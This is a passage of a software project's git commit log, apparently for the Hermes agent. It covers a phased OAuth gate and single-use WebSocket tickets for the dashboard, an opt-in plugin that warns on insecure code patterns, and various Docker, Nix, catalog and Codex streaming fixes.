gatewayClient, ChatSidebar) previously hardcoded ?token=<session>. In
gated mode the server rejects that path; the SPA must mint a single-use
ticket via POST /api/auth/ws-ticket and pass ?ticket= on the upgrade.

web/src/lib/api.ts: adds getWsTicket() (POST /api/auth/ws-ticket with
credentials: 'include') and buildWsAuthParam() — a helper that returns
['ticket', <minted>] in gated mode and ['token', <session>] in loopback.
Window.__HERMES_AUTH_REQUIRED__ is read from the server-injected
bootstrap script and toggles the path. Documented as the bridge from
cookie auth (REST) to WS auth.

web/src/pages/ChatPage.tsx: buildWsUrl() now takes an [authName, authValue]
pair instead of a bare token. The WS construct is wrapped in an IIFE so
the outer effect can stay synchronous (the cleanup returns the effect's
disposer at top level). onDataDisposable + onResizeDisposable hoisted to
`let` bindings the cleanup closes over.

web/src/lib/gatewayClient.ts: connect() branches on
window.__HERMES_AUTH_REQUIRED__ before opening /api/ws. Explicit token
overrides win (test-only path); otherwise gated → fetch ticket, loopback
→ use injected session token.

web/src/components/ChatSidebar.tsx: events-feed WS opens through the
same IIFE pattern as ChatPage. The ws local is hoisted so the cleanup's
ws?.close() works after the async mint resolves.

Server side already injects window.__HERMES_AUTH_REQUIRED__ in
_serve_index (Phase 3.5).
2026-05-27 02:12:27 -07:00
Ben b2360ba44e feat(dashboard-auth): _ws_auth_ok helper + ticket auth on all 4 WS endpoints
Phase 5 task 5.2. Four WebSocket endpoints — /api/pty, /api/ws, /api/pub,
/api/events — previously authed with the same constant-time check against
`_SESSION_TOKEN`. Replaced with a single helper that branches on
`app.state.auth_required`:

  Loopback / --insecure: legacy ?token=<_SESSION_TOKEN> path (unchanged).
  Gated:                  ?ticket=<single-use> consumed against the
                          dashboard-auth ticket store.

Critical security property: gated mode UNCONDITIONALLY rejects the
?token= path. A leaked _SESSION_TOKEN value from a log line is not
replayable for WS access in gated deployments.

`_build_sidecar_url` now branches too: loopback uses the legacy token;
gated mode mints a server-internal ticket via mint_ticket() with
pseudo-user 'pty-sidecar' / provider 'server-internal' so audit logs can
distinguish PTY-internal sidecar tickets from browser tickets. PTY
children open /api/pub exactly once at startup so single-use suffices.

Ticket rejections audit-log as WS_TICKET_REJECTED with truncated reason
+ client IP + WS path. Operators debugging 'WS keeps closing' issues see
which endpoint and why.

17 new tests:
- POST /api/auth/ws-ticket: 200 with cookie, 401/302 without, distinct
  per call, GET-not-allowed.
- _ws_auth_ok loopback: token accept/reject, missing-token reject,
  ticket-param-ignored.
- _ws_auth_ok gated: ticket accept, single-use rejection, unknown reject,
  legacy-token-rejected-in-gated assertion, audit-log emission.
- _build_sidecar_url: loopback uses token=, gated uses ticket=, no-bound
  returns None.
2026-05-27 02:12:27 -07:00
Ben b69fce9c86 feat(dashboard-auth): single-use WS tickets + POST /api/auth/ws-ticket
Phase 5 task 5.1. Browsers cannot set Authorization on a WebSocket
upgrade, so in gated mode the SPA needs an alternative way to bind the
upgrade to its authenticated session.

  hermes_cli/dashboard_auth/ws_tickets.py — in-memory single-use ticket
  store with 30s TTL. Thread-safe (threading.Lock), token_urlsafe(32)
  values, ticket value truncated to 8 chars in error messages for log
  hygiene. Module-level state with _reset_for_tests() helper.

  hermes_cli/dashboard_auth/routes.py — adds POST /api/auth/ws-ticket.
  Auth-required (the gate middleware already attaches Session to
  request.state.session). Returns {ticket, ttl_seconds}; emits
  WS_TICKET_MINTED audit event with user_id + provider + ip.

  hermes_cli/dashboard_auth/audit.py — adds WS_TICKET_REJECTED enum
  value for the consume-side rejection event (wired into the WS
  endpoints in task 5.2).

11 new tests covering round-trip, single-use, TTL boundary, unknown
ticket rejection, secret-hygiene truncation in error messages, and
concurrent mint+consume from 20 threads.
2026-05-27 02:12:27 -07:00
Ben 848baeb0a8 feat(dashboard-auth): plugins/dashboard_auth/nous — contract-compliant Nous OAuth provider
Bundled, kind=backend, auto-loads. Activates ONLY when Portal-injected
env vars are present:

  HERMES_DASHBOARD_OAUTH_CLIENT_ID  — agent:{instance_id}
  HERMES_DASHBOARD_PORTAL_URL       — Portal base URL

Loopback / --insecure operators leave both unset and never see this
plugin register anything. The fail-closed branch in start_server handles
the 'public bind + zero providers' case independently.

Implementation follows nous-account-service PR #180's published OAuth
contract verbatim:

  - client_id is per-instance (agent:{instance_id}); the suffix is
    cross-checked against the token's agent_instance_id claim as
    defense-in-depth (contract C9).
  - scope is agent_dashboard:access only (contract C3).
  - aud is the bare client_id, no hermes-cli: prefix (contract C2).
  - RS256 JWT verification against /.well-known/jwks.json with
    5-minute cache (contract C7).
  - No refresh tokens in V1: refresh_session always raises
    RefreshExpiredError; revoke_session is a no-op (contract C5).
  - oauth_contract_version claim: missing → warn + proceed; present
    and != 1 → refuse (contract C11, OQ-C2 tolerant treatment).
  - redirect_uri validated client-side as defense before bouncing to
    Portal; authoritative check is server-side per agent-redirect-uri.ts.

41 new tests covering construction, plugin-entry env gating, start_login
shape, complete_login httpx-mocked happy path + error mapping,
verify_session JWT verification (RSA keypair fixture, full claim-check
matrix), refresh_session always raising, revoke_session no-op.

PyJWT + cryptography are already in the venv (jose was previously
suggested; switched to pyjwt[crypto] since the latter is already
pulled in transitively).
2026-05-27 02:12:27 -07:00
Ben 53999b9e95 docs(dashboard-auth): plan v2 — incorporate Portal OAuth contract (PR #180)
Adds a 'Contract Anchor' section at the top of the plan summarizing the
11 material findings from nous-account-service PR #180's published
contract. Rewrites Phase 4 (Nous provider) and Phase 6 (re-auth UX)
in-place; the v1 drafts are preserved inline marked 'rejected —
preserved for archeology' for reviewer context.

Phases 0–3 (already shipped) are unaffected — they set up gate
engagement and cookie plumbing only. The cookies module's RT cookie
becomes dead in Phase 6 task 6.3 and is removed there.

Key contract-driven reversals:
  - client_id is per-instance (agent:{id}), env-injected — not static
  - audience is bare client_id, not 'hermes-cli:' prefixed
  - scope is 'agent_dashboard:access' only
  - JWT claims do NOT include email/name — surface user_id instead
  - no refresh tokens in V1 — 401 → redirect to /login
  - JWKS-only verification, no userinfo fallback
  - redirect_uri is exact-match per AgentInstance, not wildcard

Phase 7's AuthWidget needs to display user_id (truncated) instead of
email; one-line annotation added at the top of that phase.
2026-05-27 02:12:27 -07:00
Ben 53736b3922 feat(dashboard-auth): fail-closed on no providers; proxy_headers when gated; suppress _SESSION_TOKEN injection
Phase 3, Task 3.5. Three changes to web_server.py:

  1. start_server replaces the legacy SystemExit-refusing-to-bind guard
     with: if app.state.auth_required and no providers registered, exit
     with a clear message; otherwise log the gate-on banner. --insecure
     keeps its existing behaviour.

  2. uvicorn proxy_headers flag is computed from app.state.auth_required.
     Loopback / --insecure keep it False (so _ws_client_is_allowed sees
     the real peer for the loopback gate); gated mode flips it True so
     X-Forwarded-Proto from Fly's TLS terminator is honoured for cookie
     Secure-flag decisions in detect_https().

  3. _serve_index no longer injects window.__HERMES_SESSION_TOKEN__ when
     the gate is on — the SPA reads identity from /api/auth/me using
     cookie auth instead. window.__HERMES_AUTH_REQUIRED__ flag lets the
     SPA pick between ticket-auth (gated) and token-auth (loopback) for
     /api/pty + /api/ws (Phase 5 will wire this in the React layer).

4 new behavioural tests; loopback regression harness still green.
2026-05-27 02:12:27 -07:00
Ben 5b17eab67a feat(dashboard-auth): auth gate middleware + /auth/* routes + /login HTML
Phase 3, Tasks 3.2 + 3.3 + 3.4. These three pieces are mutually
dependent so they land together.

middleware.py - gated_auth_middleware engages when app.state.auth_required
is True.  Allowlists /login, /auth/*, /api/auth/providers, and static
asset paths; everything else demands a valid session_at cookie.  Verifies
by trying every registered provider's verify_session in turn (multi-
provider stack); attaches verified Session to request.state.session.
Returns 401 JSON for /api/* and 302 -> /login for HTML.  ProviderError
during verify -> 503.

routes.py - APIRouter with:
  GET  /login              server-rendered HTML
  GET  /auth/login?provider=N  302 to IDP + PKCE cookie
  GET  /auth/callback?code,state  completes login, sets session cookies
  POST /auth/logout        clears cookies + best-effort revoke
  GET  /api/auth/providers public bootstrap endpoint (503 if zero)
  GET  /api/auth/me        verified session as JSON (auth-required)

login_page.py - Inline-CSS HTML template, no React, no JavaScript.

web_server.py - Mounted gated_auth_middleware between host_header and
auth_middleware (FastAPI runs middlewares in registration order: host
check -> cookie auth -> token auth).  auth_middleware short-circuits
when auth_required so cookie auth is authoritative in gated mode.
Router is included before mount_spa so the catch-all doesn't swallow
/login or /auth/*.

17 new behavioural tests; loopback regression harness still green.
2026-05-27 02:12:27 -07:00
Ben a30c4d8ebd feat(dashboard-auth): cookie helpers for session_at/session_rt/pkce
Phase 3, Task 3.1. Three cookies:
  - hermes_session_at: OAuth access token (HttpOnly, TTL = token TTL)
  - hermes_session_rt: OAuth refresh token (HttpOnly, 30d max-age)
  - hermes_session_pkce: PKCE state + verifier + provider hint (10min)

All SameSite=Lax + Path=/. Secure flag is set ONLY when the request
scheme is https — uvicorn proxy_headers=True (enabled in gated mode at
Phase 3.5) rewrites scheme from X-Forwarded-Proto so Fly's TLS
terminator works.
2026-05-27 02:12:27 -07:00
Ben 628a52fce2 test(dashboard-auth): stub auth provider for E2E gate testing
Phase 2, Task 2.1. Self-contained fake IDP — start_login redirects
straight back to {redirect_uri}?code=stub_code&state=<s> so tests can
walk the OAuth round trip in-process. Tokens are HMAC-signed JSON blobs
(not real JWTs) — enough structure for verify_session to detect tamper
and expiry without pulling in pyjwt.

Lives in tests/ only — never registered as a real plugin. Phase 3's
end-to-end tests import StubAuthProvider directly.

Convention: exp <= now counts as expired (TTL=0 means born-expired)
— matches what Phase 6's silent-refresh test will need.
2026-05-27 02:12:27 -07:00
Ben 865cae4f61 feat(dashboard-auth): json-lines audit log at $HERMES_HOME/logs/dashboard-auth.log
Phase 1, Task 1.4. Records every auth event (login start/success/failure,
logout, refresh success/failure, revoke, session verify failure, WS
ticket mint) as one JSON object per line. Token-like kwargs (access_token,
refresh_token, code, code_verifier, state, ticket, cookie, Authorization)
are dropped before serialisation so the log never contains live secrets.

Write failures log at WARNING but never raise — auth flows must not fail
because the audit logger broke.
2026-05-27 02:12:27 -07:00
Ben c32b17f557 feat(plugins): add register_dashboard_auth_provider hook on PluginContext
Phase 1, Task 1.3. Mirrors the existing register_image_gen_provider
pattern (plugins.py:531) — wrong-type or duplicate-name registrations
log at WARNING and silently return rather than raising, so a misbehaving
auth plugin cannot crash the host.

Deviation from plan: the plan's draft raised TypeError on non-provider
input; switched to silent-warn to match the established image_gen
convention. Test updated to match.
2026-05-27 02:12:27 -07:00
Ben 1bbfed70c4 test(dashboard-auth): cover registry register/get/list/clear semantics
Phase 1, Task 1.2. Verifies registration order is preserved, duplicate
names are rejected with ValueError, and non-compliant providers fail at
register time (not later when the middleware tries to dispatch).
2026-05-27 02:12:27 -07:00
Ben 2dc6d03a3d feat(dashboard-auth): define DashboardAuthProvider ABC + Session dataclass
Phase 1, Task 1.1. New package hermes_cli/dashboard_auth/ contains:

  base.py     - DashboardAuthProvider ABC with 5 abstract methods
                (start_login, complete_login, verify_session,
                refresh_session, revoke_session), Session + LoginStart
                frozen dataclasses, three exception types
                (ProviderError / InvalidCodeError / RefreshExpiredError),
                and assert_protocol_compliance() for plugins to call
                in their own tests.
  registry.py - Module-level register/get/list/clear with a lock.

Nothing reads the registry yet — Phase 2 adds the StubAuthProvider and
Phase 3 wires the gate middleware. The plugin hook lands in Task 1.3.
2026-05-27 02:12:27 -07:00
Ben 949ad95e4b feat(dashboard): stash auth_required flag on app.state
Phase 0, Task 0.3. start_server now computes should_require_auth(host,
allow_public) and records it on app.state.auth_required BEFORE the
existing legacy SystemExit guard fires. This gives middleware, the SPA
token-injection path, and WS endpoints a consistent read source for
'is the gate active'. The flag is set but no one reads it yet — Phase 3
registers the gate middleware.

Note: 4 pre-existing test failures in tests/hermes_cli/test_web_server.py
(PtyWebSocket) + test_update_hangup_protection.py reproduce on pristine
HEAD and are unrelated to this change (starlette TestClient WS regression).
2026-05-27 02:12:27 -07:00
Ben 8773bbf186 feat(dashboard): add should_require_auth predicate for OAuth gate
Phase 0, Task 0.2. Single source of truth for 'is the auth gate active?'.
Reuses the existing _LOOPBACK_HOST_VALUES frozenset so this stays in sync
with the DNS-rebinding host-header check. RFC1918/CGNAT/link-local are
treated as public — exact threat model the gate exists for.
2026-05-27 02:12:27 -07:00
Ben f2b479e7a2 test(dashboard): pin current loopback auth behavior as regression harness
Phase 0, Task 0.1 of the dashboard-oauth plan. Establishes a baseline for
the loopback dashboard's auth surface so future phases can prove they
didn't regress the existing _SESSION_TOKEN flow when adding the OAuth gate.
2026-05-27 02:12:27 -07:00
Teknium 249534e472 plugins: add security-guidance — pattern-matched warnings on dangerous code writes (#33131)
New opt-in plugin that scans the content passed to write_file / patch /
skill_manage for 25 known-dangerous code patterns — pickle.load,
yaml.load, eval(, os.system, subprocess(shell=True), child_process.exec,
dangerouslySetInnerHTML, innerHTML/outerHTML/document.write/
insertAdjacentHTML, crypto.createCipher (no IV), AES ECB,
TLS verification disabled, XXE-prone xml.etree/minidom parsers,
<script src=//...> without SRI, torch.load without weights_only=True,
GitHub Actions ${{ github.event.* }} injection — and appends a
"Security guidance" warning block to the tool result via the
transform_tool_result hook.

Default behaviour is non-blocking: the file is written and the warning
rides back to the model in the next turn so it can self-correct or
document why the construct is safe. SECURITY_GUIDANCE_BLOCK=1 upgrades
to refusing the write entirely; SECURITY_GUIDANCE_DISABLE=1 is the
kill switch.

Pattern data (patterns.py) is a verbatim Apache-2.0 fork of
Anthropic's claude-plugins-official/plugins/security-guidance/hooks/
patterns.py at commit 0bde168 (2026-05-26). LICENSE and NOTICE
preserve attribution. The Hermes-side plugin glue (__init__.py,
plugin.yaml, README.md, tests) is original work.

Plugin is opt-in like all bundled plugins:
  hermes plugins enable security-guidance

Inspired by https://x.com/ClaudeDevs/status/1927108527247... — Anthropic
shipped this as their security-guidance plugin for Claude Code on
2026-05-26 with a measured 30-40% reduction in security-related PR
comments on internal rollout.

What's NOT ported (deferred):
  * Layer 2 (LLM diff review on turn end) — would route through main
    model by default on Hermes, real money on reasoning models. A
    follow-up can wire it to a cheap aux model with explicit opt-in.
  * Layer 3 (agentic commit-time review) — agent can run this on
    demand via delegate_task today.
  * .hermes/security-guidance.md project-rules file — only used by
    layers 2/3 upstream.
2026-05-27 02:07:21 -07:00
Teknium c752205635 chore(release): map superearn-fisher noreply for #33122 salvage 2026-05-27 02:06:21 -07:00
SuperEarn 4920f8437f test(codex): cover null output stream terminal events 2026-05-27 02:06:21 -07:00
orcool f0fdb5e67d feat(catalog): add qwen3.7-max to alibaba + alibaba-coding-plan model lists
Alibaba's latest flagship Qwen model is released but not yet present in the
DashScope (alibaba) or Alibaba Coding Plan curated catalogs.  Add it so it
shows up in the /model picker and setup wizard for those providers.

OpenCode Go routing for qwen3.7-max already landed via #32780 (commit 2fc77c53f).
OpenRouter + Nous catalog entries already landed via #32809 (commit ccd3d04fc).
This salvage picks up the remaining alibaba / alibaba-coding-plan entries from
#32806 — the AI Gateway entry is dropped because Vercel AI Gateway was removed
in #33067.
2026-05-27 02:05:58 -07:00
Teknium 96223265b9 chore(api-server): mark skills_api capability True now that /v1/skills shipped
#33016 added GET /v1/skills + /v1/toolsets on the API server; the
capability flag introduced in this branch was placeholder-False. Flip
to True so capability probers see the truth.
2026-05-27 01:56:55 -07:00
Jonathan 464b51d455 Support media in session chat API 2026-05-27 01:56:55 -07:00
Bailey Dixon f7527b0fdb feat: add API server session controls 2026-05-27 01:56:55 -07:00
Teknium f0be32232d chore(release): map EvilHumphrey noreply for #33034 salvage 2026-05-27 01:52:34 -07:00
EvilHumphrey 4243b6dc45 fix(codex): update silent-hang workaround hint 2026-05-27 01:52:34 -07:00
Siddharth Balyan 976979489a feat(nix): add #messaging and #full package variants (#33108)
* fix(plugins/discord): correct install_hint extra to [messaging]

The Discord platform registered install_hint pointing at
'hermes-agent[discord]', but pyproject.toml has no [discord] extra —
the deps live in [messaging] alongside Telegram and Slack. Users hitting
"Platform 'Discord' requirements not met" were directed at a pip command
that installs nothing.

* feat(nix): add #messaging and #full package variants

Make Discord/Telegram/Slack work out of the box for `nix profile install`
users. Messaging deps were dropped from [all] on 2026-05-12 in favor of
lazy-install, but lazy-install can't write to the read-only /nix/store —
users hit "No adapter available for discord" with no actionable guidance.

  - #messaging: pre-built with discord.py/telegram/slack (+33 MB venv)
  - #full:      all 18 platform-portable extras + matrix on Linux only
                (python-olm lacks Darwin PyPI wheels) (+738 MB venv)

Also adds a `messaging-variant` flake check that verifies `import discord`
succeeds in the sealed venv — regression guard for the lazy-install
migration.

Docs updated: Quick Start callout, extraDependencyGroups rewrite with
messaging as primary example + full extras table, troubleshooting row,
cheatsheet row.

Closure size deltas (measured x86_64-linux):
  default   1792 MB pkg / 512 MB venv
  messaging 1826 MB pkg / 546 MB venv   (+33 MB)
  full      2530 MB pkg / 1250 MB venv  (+738 MB)

* chore(nix): trim variant comments + alphabetize full extras

Drop the date-stamped changelog from messaging-variant's comment and the
"+33 MB / +704 MB" numbers from the variant defs — those drift and belong
in the PR description, not source. Alphabetize the 18-extra list in #full
so future additions produce clean one-line diffs.

No semantic change. messaging-variant check still passes.
2026-05-27 14:15:39 +05:30
Teknium 25f43d38de feat(api-server): add GET /v1/skills and /v1/toolsets (#33016)
Lets external clients enumerate the agent's skills and resolved toolsets
deterministically over the OpenAI-compatible API server, without standing
up the dashboard web server or sending a chat message and asking the model
to list them.

- GET /v1/skills — list installed skills (name, description, category)
- GET /v1/toolsets — list toolsets resolved for the api_server platform,
  with enabled/configured state and the concrete tool names each expands
  to
- Both gated by API_SERVER_KEY (same Bearer scheme as every other /v1/*
  endpoint)
- /v1/capabilities advertises both new endpoints

Closes the gap a community user just hit asking how to list skills over
REST when only the OpenAI-compatible server is running.

Test plan
- python -m pytest tests/gateway/test_api_server.py -k "Skills or Toolsets or Capabilities" -o 'addopts=' -q
  → 9/9 pass
- python -m pytest tests/gateway/test_api_server.py -o 'addopts=' -q
  → 156/156 pass, no regressions
- E2E: started a real adapter on an isolated HERMES_HOME with a fake
  skill installed; curl-equivalent calls to /v1/capabilities,
  /v1/skills, /v1/toolsets returned the expected JSON; unauthenticated
  calls returned 401 with the configured API_SERVER_KEY.
2026-05-27 01:27:26 -07:00
Teknium febc4cfec0 remove Vercel AI Gateway and Vercel Sandbox (#33067)
* remove Vercel AI Gateway provider and Vercel Sandbox terminal backend

Both Vercel-hosted integrations are removed end-to-end. Users on the AI
Gateway should switch to OpenRouter or one of the other aggregators
(Nous Portal, Kilo Code). Users on the Vercel Sandbox backend should
switch to Docker, Modal, Daytona, or SSH.

What's removed:
- `plugins/model-providers/ai-gateway/` provider plugin
- `hermes_cli/vercel_auth.py` Vercel-Sandbox auth helper
- `tools/environments/vercel_sandbox.py` terminal backend
- `ai-gateway` provider wiring across auth, doctor, setup, models,
  config, status, providers, main, web_server, model_normalize, dump
- `vercel_sandbox` backend wiring across terminal_tool, file_tools,
  code_execution_tool, file_operations, approval, skills_tool,
  environments/local, credential_files, lazy_deps, prompt_builder,
  cli, gateway/run
- `AI_GATEWAY_BASE_URL` constant, `_AI_GATEWAY_HEADERS` auxiliary-client
  header set, run_agent base-URL header/reasoning special-cases
- `[vercel]` pyproject extra and `vercel`/`vercel-workers` from uv.lock
- env vars: `AI_GATEWAY_API_KEY`, `AI_GATEWAY_BASE_URL`, `VERCEL_TOKEN`,
  `VERCEL_PROJECT_ID`, `VERCEL_TEAM_ID`, `VERCEL_OIDC_TOKEN`,
  `TERMINAL_VERCEL_RUNTIME`
- Tests: deletes test_ai_gateway_models.py and
  test_vercel_sandbox_environment.py; scrubs references across 23
  surviving test files (no entire tests deleted unless they were
  dedicated to AI Gateway / Sandbox)
- Docs: provider tables, env-var reference, setup guides, security
  notes, tool config, terminal-backend tables — English plus zh-Hans
  i18n parity
- `hermes-agent` skill: provider table entry and remote-backend list

What stays (intentional):
- `popular-web-designs/templates/vercel.md` — CSS design reference,
  unrelated to Vercel-the-AI-product
- `x-vercel-id` in `stream_diag.py` headers — generic Vercel CDN
  response header, useful diag signal on any Vercel-hosted endpoint
- `vercel-labs/agent-browser` URL in browser config — lightpanda
  browser project, different OSS effort
- `userStories.json` historical contributor entry mentioning Vercel
  Sandbox — archive, not active docs

Validation:
- 1153 tests in the 22 targeted files pass (`scripts/run_tests.sh`)
- Full repo `py_compile` clean
- Live import of every touched module + invariant check (no
  `ai-gateway` in `PROVIDER_REGISTRY`, no `_AI_GATEWAY_HEADERS`, no
  `vercel_sandbox` in `_REMOTE_TERMINAL_BACKENDS`)

* test: convert profile-count check from change-detector to invariant

The hardcoded "== 34" assertion broke when ai-gateway was removed.
Per AGENTS.md change-detector-test guidance, assert the relationship
(registry count >= number of plugin dirs) instead of a literal count.
Counts shift when providers are added/removed; that's expected.
2026-05-27 00:43:32 -07:00
Teknium cb38ce28cb refactor(codex): drop SDK responses.stream() helper; consume events directly (#33042)
* refactor(codex): drop SDK responses.stream() helper; consume events directly

The OpenAI Python SDK's high-level `client.responses.stream(...)` helper
does post-hoc typed reconstruction from the terminal
`response.completed.response.output` field.  The chatgpt.com Codex
backend has been observed (today, gpt-5.5) to ship `response.output =
null` on terminal frames, which crashes the SDK with `TypeError:
'NoneType' object is not iterable` mid-iteration.

Carlton's #32963 patched the symptom by wrapping the helper in
try/except and recovering from the same per-event accumulator the SDK
was supposed to populate.  This PR removes the helper from the call
path entirely: we now use `client.responses.create(stream=True)` (raw
AsyncIterable of SSE events) and assemble the final response object
ourselves from `response.output_item.done` events as they arrive.  The
terminal event's `output` field is never read for content.  Same
strategy OpenClaw uses for the same backend.

This makes Hermes structurally immune to the bug class, not patched.
The next time OpenAI ships a shape change to chatgpt.com's terminal
frame, our consumer keeps working because it doesn't read that frame
for content — only for usage/status/id.

Changes
- `agent/codex_runtime.py`: new `_consume_codex_event_stream()` shared
  consumer; `run_codex_stream()` uses `responses.create(stream=True)`;
  `run_codex_create_stream_fallback()` collapses into a thin alias
  since the primary path now does what the fallback used to do.
- `agent/auxiliary_client.py`: `_CodexCompletionsAdapter` uses the
  same consumer; old null-output recovery helpers deleted as
  unreferenced.
- Tests migrated: fixtures that mocked `responses.stream` now mock
  `responses.create` returning a raw iterable.  New regression test
  asserts the auxiliary path returns streamed items even when the
  terminal event's `output` is literally `null`.

Validation
- Live: tested against fresh OAuth on `chatgpt.com/backend-api/codex`
  with `gpt-5.5` — response built correctly with `response.output=null`
  on the terminal frame, all events consumed, usage/reasoning tokens
  propagated.
- `tests/run_agent/test_run_agent_codex_responses.py` +
  `tests/agent/test_auxiliary_client.py`: 242 passed.

* test+fix(codex): migrate streaming tests, raise on truncated streams

CI surfaced 10 test failures across tests/run_agent/test_streaming.py
and tests/run_agent/test_codex_xai_oauth_recovery.py — both files had
their own `responses.stream(...)` mocks I missed in the first sweep.

agent/codex_runtime.py: _consume_codex_event_stream() now raises
"Codex Responses stream did not emit a terminal response" when the
stream ends without any terminal frame AND no usable content. This
preserves the signal callers used to get from the SDK's high-level
helper, which they distinguished from "completed with empty body"
in error handling.

Tests migrated:
- test_streaming.py: text-delta callback, activity-touch, and
  remote-protocol-error tests all switch from mocking responses.stream
  to responses.create returning an iterable of events.
- test_codex_xai_oauth_recovery.py: prelude-error tests are recast as
  wire-error-event tests (the new path raises _StreamErrorEvent
  directly when the wire emits type=error, which is strictly better
  than the old two-phase "SDK RuntimeError → retry → fallback"). The
  retry-on-transport-error test moves from responses.stream side-effect
  to responses.create side-effect.

Verified live against chatgpt.com Codex with gpt-5.5 — AIAgent.chat()
through the full codex_responses path returns correctly, 319/319
targeted tests passing.
2026-05-27 00:30:06 -07:00
Ben fb298a958c fix(docker): mkdir HERMES_HOME as root in stage2 before chown / privilege drop (#18488)
When HERMES_HOME points at a custom path whose parent directories
only root can create (e.g. HERMES_HOME=/home/hermes/.hermes in a
Compose file, or any path under a fresh / not pre-populated by the
image), stage2-hook.sh fails on first boot:

  [stage2] Warning: chown failed (rootless container?) - continuing
  mkdir: cannot create directory '/custom': Permission denied
  mkdir: cannot create directory '/custom': Permission denied
  ... (one per s6-setuidgid hermes mkdir invocation)
  cont-init: info: /etc/cont-init.d/01-hermes-setup exited 1

The mkdirs fail because s6-setuidgid drops to hermes (UID 10000)
before invoking mkdir -p, and the runtime user has no permission to
create root-owned ancestor directories. 02-reconcile-profiles then
crashes with FileNotFoundError, .install_method never lands, and
the container limps on in a half-initialized state.

Bootstrap HERMES_HOME with mkdir -p while still root, before the
ownership normalization. Idempotent on the default /opt/data path
(directory already exists from the Dockerfile RUN mkdir -p) and on
any subsequent restart. (#18482)

Retargeted from the original PR's docker/entrypoint.sh (now a
deprecated shim) to docker/stage2-hook.sh where the related chown
logic moved during the s6-overlay rework.

Co-authored-by: wpengpeng168 <133926080+wpengpeng168@users.noreply.github.com>
2026-05-27 17:16:40 +10:00
Ben c3bdb2af37 ci(docker): add shellcheck shell=sh directive to main-wrapper.sh
shellcheck doesn't recognize the s6-overlay `#!/command/with-contenv sh`
shebang and aborts with SC1008 ("This shebang was unrecognized. ShellCheck
only supports sh/bash/dash/ksh/'busybox sh'. Add a 'shell' directive to
specify."). The error fires at --severity=error too, so it fails the
"Docker / shell lint" CI job on every PR that touches docker/.

Add the canonical `# shellcheck shell=sh` directive — same fix already
applied to the sibling cont-init.d scripts (`02-reconcile-profiles` and
`015-supervise-perms`) when they adopted the with-contenv shebang.

The shebang was changed from `#!/bin/sh` → `#!/command/with-contenv sh`
in PR #32412 (commit 29c71e9) to fix env-propagation through s6's PID 1.
The shellcheck-directive line was missed in that PR; this patches it.

Reproduces locally:
  docker run --rm -v "$PWD:/mnt" -w /mnt koalaman/shellcheck:stable \
    --severity=error --format=gcc docker/main-wrapper.sh

Before:  docker/main-wrapper.sh:1:1: error: [SC1008]  (rc=1)
After:   (no output)                                   (rc=0)

Script behavior is unchanged — the directive is a comment, and `sh -n`
/ `bash -n` parse the file cleanly either way.
2026-05-27 16:32:35 +10:00
Ben 27a29ee54e feat(docker): upgrade Node to 22 LTS via multi-stage from node:22-bookworm-slim (#4977)
Debian trixie's bundled `nodejs` package is pinned to 20.19.2, which
reached LTS EOL in April 2026. Trixie won't upgrade in place; Debian 14
(forky) — where the apt nodejs is 24.x — isn't released until ~mid-2027.

To stay on a supported LTS without waiting for Debian 14, copy node + npm
+ corepack from the upstream `node:22-bookworm-slim` image as a
multi-stage source, matching the existing `uv_source` and `gosu_source`
patterns in the Dockerfile. Bookworm-based slim image is used so the
produced binary links against glibc 2.36, which runs cleanly on Debian 13
(trixie, glibc 2.41).

Changes:
- Add `FROM node:22-bookworm-slim@sha256:... AS node_source` stage
- Remove `nodejs npm` from `apt-get install` (now sourced from node_source)
- Add `ca-certificates` explicitly to apt install (was a transitive of
  the apt nodejs package; removing nodejs broke the chain and curl
  inside the build failed with "error setting certificate file")
- COPY node binary + npm + corepack from node_source; recreate the
  symlinks at /usr/local/bin/{npm,npx,corepack}
- Update the npm_config_install_links=false comment block — npm 10's
  default is already `install-links=false`, but we keep the env as
  defense-in-depth against future Node-source-version regressions

Future bumps to Node 24/26 are a one-line ARG change.

Validation:
- Built --no-cache against current origin/main; build succeeds in 1m42s
- Image size: 3.27 GB (pre-salvage-1 baseline) → 3.14 GB (this PR);
  net 130 MiB savings (60 MiB from this change alone vs current main —
  removing apt nodejs+transitive deps that duplicated what node bundles)
- Node 22.22.3 / npm 10.9.8 / esbuild 0.27.7 all run cleanly under
  trixie's glibc 2.41
- Standard image smoke (6/6), Node-version E2E (8/8), chown E2E from
  #19788 (6/6), TUI UID-remap E2E from #28851 (4/4) — 24 checks total

Co-authored-by: Prithvi Monangi <8312237+Prithvi1994@users.noreply.github.com>
2026-05-27 16:22:21 +10:00
Ben 22eb4d13f7 fix(docker): chown ui-tui and node_modules on UID remap so TUI esbuild works (#28851)
When HERMES_UID remaps the hermes user from 10000 to another UID
(e.g. matching the host user's UID for bind-mount ergonomics), the TUI
launcher's esbuild step fails:

  ✘ [ERROR] Failed to write to output file:
     open /opt/hermes/ui-tui/dist/entry.js: permission denied
  TUI build failed.

This is because the Dockerfile's build-time `chown -R hermes:hermes` on
`/opt/hermes/{.venv,ui-tui,node_modules}` (line 154) wrote UID 10000,
and stage2-hook.sh only re-chowned `.venv` on UID remap — leaving the
TUI build trees still owned by the old UID.

Extend the stage2 re-chown to include the same set as the build-time
chown: `.venv`, `ui-tui`, `node_modules`. These are the runtime-writable
trees under $INSTALL_DIR; everything else under /opt/hermes is read-only
at runtime so keeping it root-owned is fine.

Original fix targeted docker/entrypoint.sh which is now a deprecated shim;
retargeted to docker/stage2-hook.sh where the .venv chown moved during
the s6-overlay rework.

Co-authored-by: Andreas Steffan <623481+deas@users.noreply.github.com>
2026-05-27 15:41:48 +10:00
Ben 9eadb6805c fix(docker): targeted chown to preserve host file ownership in HERMES_HOME (#19795)
Replaces the recursive chown of $HERMES_HOME in stage2-hook.sh with a
targeted approach: chown the top-level dir (so hermes can create new subdirs)
plus the specific hermes-owned subdirectories (cron/, sessions/, logs/,
hooks/, memories/, skills/, skins/, plans/, workspace/, home/, profiles/) —
the same canonical list seeded by the s6-setuidgid mkdir -p block below.

Avoids clobbering host-side file ownership when $HERMES_HOME is a bind
mount that contains user-owned files not managed by hermes (issue #19788).

Original fix targeted docker/entrypoint.sh which is now a deprecated shim;
retargeted to docker/stage2-hook.sh where the recursive chown moved during
the s6-overlay rework.

Co-authored-by: Ptichalouf <1809721+ptichalouf@users.noreply.github.com>
2026-05-27 15:08:41 +10:00
Teknium b6ca56f651 fix(codex-responses): gracefully recover from invalid_encrypted_content (salvage #10144) (#33035)
* fix(codex-responses): gracefully recover from invalid_encrypted_content (salvage #10144)

When an OpenAI-compatible Responses API surface accepts an initial
request but later rejects the replayed `codex_reasoning_items`
encrypted blob with HTTP 400 `invalid_encrypted_content`, the
